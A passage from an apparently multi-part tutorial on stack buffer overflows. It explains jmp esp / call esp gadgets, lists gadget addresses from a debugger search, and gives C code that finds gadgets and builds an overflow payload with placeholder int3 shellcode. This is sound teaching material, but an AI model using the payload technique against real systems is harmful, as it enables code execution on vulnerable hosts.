In the previous parts we exploited strcpy's lack of a length check to overwrite the saved return address and redirect execution into our own data.
However, if the program's stack is not at the same address every time it is loaded, a return address hardcoded to point at our buffer will no longer hit the shellcode, and execution lands in the wrong place.
So instead of guessing a stack address, we use code that the process already has in memory to perform the jump: a jmp esp instruction.
Overwrite the return address with the address of a jmp esp (or call esp) instruction.
Use a debugger plugin to search the loaded modules for jmp esp or call esp. The search below was run on a system without ASLR (kernel32 at 7C8xxxxx, ntdll at 7C9xxxxx); on a system that randomizes module bases these addresses change at every boot, so repeat the search on the actual target.
0027762F Location found: call esp in [unknown]
00277A0D Location found: call esp in [unknown]
00277A17 Location found: call esp in [unknown]
003010C8 Location found: call esp in [unknown]
00305028 Location found: jmp esp in [unknown]
76D7B543 Location found: call esp in [unknown]
7C8369F0 Location found: call esp in kernel32.text
7C86467B Location found: jmp esp in kernel32.text
7C868667 Location found: call esp in kernel32.text
7C934663 Location found: call esp in ntdll.text
7C97311B Location found: call esp in ntdll.text
7FFA4512 Location found: jmp esp in [unknown]
7FFA54CD Location found: jmp esp in [unknown]
13 addresses found, 0 filtered
We pick one of these as the jump target, preferring an address in a system module whose bytes contain no 0x00, since strcpy would stop copying at a NUL byte.
The shellcode goes immediately after the overwritten return address.
When the function's ret pops our gadget address, esp points at exactly the bytes that follow it on the stack, so jmp esp transfers control to the shellcode without our needing to know the stack address in advance.
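The following is an added example (not code from the original article) that shows the two mechanical steps described above in C: scanning a byte image for the opcode patterns the plugin searches for (jmp esp is FF E4, call esp is FF D4 in 32-bit x86), and laying out the overflow string as padding, a little-endian gadget address, then the shellcode. The sample image, the return-address offset of 8 and the four int3 bytes used as shellcode are constructed for illustration; the gadget address 7C86467B is the kernel32 jmp esp from the search output above and is only valid on that system.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 32-bit x86 encodings of the two gadgets the debugger plugin searched for. */
static const uint8_t JMP_ESP[2]  = { 0xFF, 0xE4 };
static const uint8_t CALL_ESP[2] = { 0xFF, 0xD4 };

/* Scan a byte image (e.g. a module's .text section read into memory) for
 * jmp esp / call esp. Each hit is reported as base + offset, mirroring the
 * plugin's "Location found" lines. Returns the number of hits written. */
size_t find_esp_gadgets(const uint8_t *img, size_t len, uint32_t base,
                        uint32_t *hits, size_t max_hits)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len && n < max_hits; i++) {
        if (memcmp(img + i, JMP_ESP, 2) == 0 || memcmp(img + i, CALL_ESP, 2) == 0)
            hits[n++] = base + (uint32_t)i;
    }
    return n;
}

/* Lay out the overflow string: padding up to the saved return address,
 * the gadget address in little-endian byte order, then the shellcode, which
 * is what esp points at once ret has popped the overwritten return address.
 * Returns the payload length, or 0 if it does not fit in the buffer. */
size_t build_payload(uint8_t *out, size_t cap, size_t ret_offset,
                     uint32_t gadget, const uint8_t *sc, size_t sc_len)
{
    size_t total = ret_offset + 4 + sc_len;
    if (total > cap) return 0;
    memset(out, 'A', ret_offset);
    out[ret_offset + 0] = (uint8_t)(gadget);
    out[ret_offset + 1] = (uint8_t)(gadget >> 8);
    out[ret_offset + 2] = (uint8_t)(gadget >> 16);
    out[ret_offset + 3] = (uint8_t)(gadget >> 24);
    memcpy(out + ret_offset + 4, sc, sc_len);
    return total;
}

/* strcpy stops at the first NUL, so any 0x00 inside the payload truncates it
 * before the shellcode lands on the stack. Returns 1 if the payload is safe. */
int strcpy_safe(const uint8_t *p, size_t len)
{
    return memchr(p, 0, len) == NULL;
}

int main(void)
{
    /* Constructed sample image, not a real module dump: one jmp esp, one call esp. */
    const uint8_t img[] = { 0x90, 0x90, 0xFF, 0xE4, 0x55, 0x8B, 0xEC,
                            0xFF, 0xD4, 0xC3 };
    uint32_t hits[8];
    size_t n = find_esp_gadgets(img, sizeof img, 0x7C800000u, hits, 8);
    for (size_t i = 0; i < n; i++)
        printf("gadget at %08X\n", hits[i]);

    /* Constructed shellcode placeholder: four int3 instructions (break into the debugger). */
    const uint8_t sc[] = { 0xCC, 0xCC, 0xCC, 0xCC };
    uint8_t payload[64];
    size_t len = build_payload(payload, sizeof payload, 8, 0x7C86467Bu, sc, sizeof sc);
    printf("payload length %zu, strcpy-safe: %d\n", len, strcpy_safe(payload, len));
    return 0;
}
```

The NUL check is the one most often forgotten: an address such as 00401000 inside the main executable would look attractive because it is not relocated, but its leading 0x00 byte ends the strcpy copy and the shellcode never reaches the stack.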
Correspondingly,